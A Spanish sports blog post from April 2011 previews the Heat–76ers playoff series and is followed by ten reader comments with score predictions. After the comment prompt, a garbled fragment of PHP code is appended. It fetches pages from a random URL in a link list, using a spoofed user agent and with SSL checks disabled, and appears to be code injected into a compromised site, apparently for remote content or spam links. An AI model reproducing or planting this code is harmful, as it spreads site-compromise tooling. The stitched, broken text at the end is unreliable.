Análisis Miami Heat vs Philadelphia 76ers

14 de April de 2011 por TheDeerHunter

Regular: 3-0 para Heat.

Heat: 102.1 PF – 94.8 PC (+7.3)
76ers: 99 PF – 97.4 PC (+1.6)

Los Heat llegan al momento crucial en la cresta de la ola. Tras superar situaciones críticas de todo tipo, el Big Three “playero” funciona mejor que nunca. La única duda que queda por despejar es la adaptación al ritmo más pausado propio de postemporada. Se presentan con uno de los mejores y más equilibrados balances ataque-defensa del campeonato y al contrario de lo que podría parecer también pertenecen al tercio con mejor ratio reboteador. Sin embargo, se trata de uno de los peores equipos pasadores de la liga y esto en postemporada es un hándicap delicado.

Los Sixers de Doug Collins pueden ser la mejor piedra de toque para los Heat en estos momentos. Se trata de una especie de Némesis. Un equipo altamente solidario, con muchas y variadas alternativas, gran profundidad y un más un excelente trato de la bola. Defienden y rebotean razonablemente bien y, aunque carecen del talento ofensivo de sus rivales de primera ronda, no deberían ser ninguna perita en dulce. Un equipo bien trabajado.

Con todo los favoritos son los Heat mientras no se demuestre lo contrario.

Claves de la eliminatoria:

El control del juego: Si los Sixers tienen alguna ventaja frente a los Heat es en la posición de base. Louis Williams y Jrue Holiday son a priori superiores a Bibby  o House, aunque estos dos tengan más experiencia y tanto Wade como LeBron puedan ayudarles en ese sentido. Es fundamental para los Sixers que, por un lado, los Heat no puedan correr y, por el otro, que su ataque resulte fluido. Los dos bases de Philadelphia deben vigilar su ratio asistencias/pérdidas así como sosegar sus instintos ofensivos.

La hora de Thaddeus: El rol como 6º hombre de Young durante la regular es uno de los grandes aciertos de Doug Collins. Ha sido uno de los mejores de la liga saliendo desde el banco. En esta serie él puede ser la piedra angular de todo, tanto para ayudar por dentro si quieren imponer su juego interior, tanto para intentar parar simultáneamente a LeBron y Wade (recordemos que Flash les ha hecho un traje los tres partidos previos) como para refrescar y fortalecer el ataque.

Tres no son multitud: La carga de minutos sobre los hombros de Wade, LeBron y Bosh puede pasarles factura en algún momento. Ante una plantilla larga y variada como la que maneja Doug Collins la posibilidad de que la serie se enquiste podría resultar fatal. En una serie a 7 partidos los ajustes benefician al menos previsible. El papel de Bibby, House, Miller, Ilgauskas o Dampier se antoja fundamental. Curiosamente el mejor jugador de rotación contra los Sixers en la regular fue Arroyo, que ya no está en la plantilla.

Pronóstico: 4-1 Heat

Comenta

10 comentarios a esta entrada

  1. Javijaen dice:
    #1

    Ratifico pronóstico. 4-1 porque el cuarto los Heat se dejen llevar…

      Citar

  2. Scriers dice:
    #2

    Pues yo aquí veo un 4 – 0 porque Lebron y Wade son muy dados a ensañarse sobre todos con rivales así. Creo que pasarán por encima.

      Citar

  3. Denise dice:
    #3

    4-1 para los Heat, con 2 de los 4 partidos ganados por paliza, con una diferencia de +20 sobre los Sixers.

      Citar

  4. Txusma dice:
    #4

    Pues venga, 4-2. Los Sixers arañan uno en Miami y se llegan a poner 2-2.

    Louis Williams creo que anda tocado pero llegará para Playoffs.

      Citar

  5. Scriers dice:
    #5

    He hecho mis predicciones en http://www.elclubdelosimposibles.es (de momento, solo de la conferencia este).

      Citar

  6. Viva_Dirk dice:
    #6

    Yo estoy seguro de que los Sixers les van a hacer trabajar muy muy duro a los Heat, recuperar al Brand de inicio de temporada les vendria genial.

      Citar

  7. Sempren dice:
    #7

    El Brand de final de temporada también estuvo bastante anotador, al menos por lo que dicen las estadísticas

      Citar

  8. GreenPride dice:
    #8

    Bueno llegó la hora de la verdad para los “Beach Boys”, que de momento tienen todas las dudas sobre sus cabezas aunque también todas las expectativas. ¿Podrán adaptarse al juego lento de playoffs sin colapsarse como les ocurrió ha menudo en la regular cuando no podían correr? Esta primera eliminatoria será una buena manera para ellos de ir empezando a sufrir pues los Sixers desde mi punto de vista no tienen equipo para ganar la serie pero sí para hacerles sudar de lo lindo con su juego de equipo y defensa. Si ralentizan los partidos se lo harán pasar muy mal a los Heat aunque creo que estos resolverán en 5 o 6 partidos aunque sin ninguna paliza de por medio

      Citar

  9. Ru dice:
    #9

    Equipos totalmente antagónicos,la verdad es que me pongo a pensar y la profundida de de banquillo de los Sixers puede hacer mucha pupa a los Heat,y cabe pensar en una eliminatoria dura y larga.Sin embargo,esta primera ronda debe ser el chispazo para que los Heat se postulen como candidatos al anillo disipando todas las dudas de la RS y si LeBron consiguió en un equipo como los Cavaliers llegar lejos en PO,con Wade y Bosh -que no es santo de mi devoción y ójala lo traspasen- Miami no debe pasar apuros.Me quedo en el término medio,4-2 para los Heat.Eliminatoria interesante.

      Citar

  10. German dice:
    #10

    Lamentablemente veo una barrida del Heat en esta serie

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>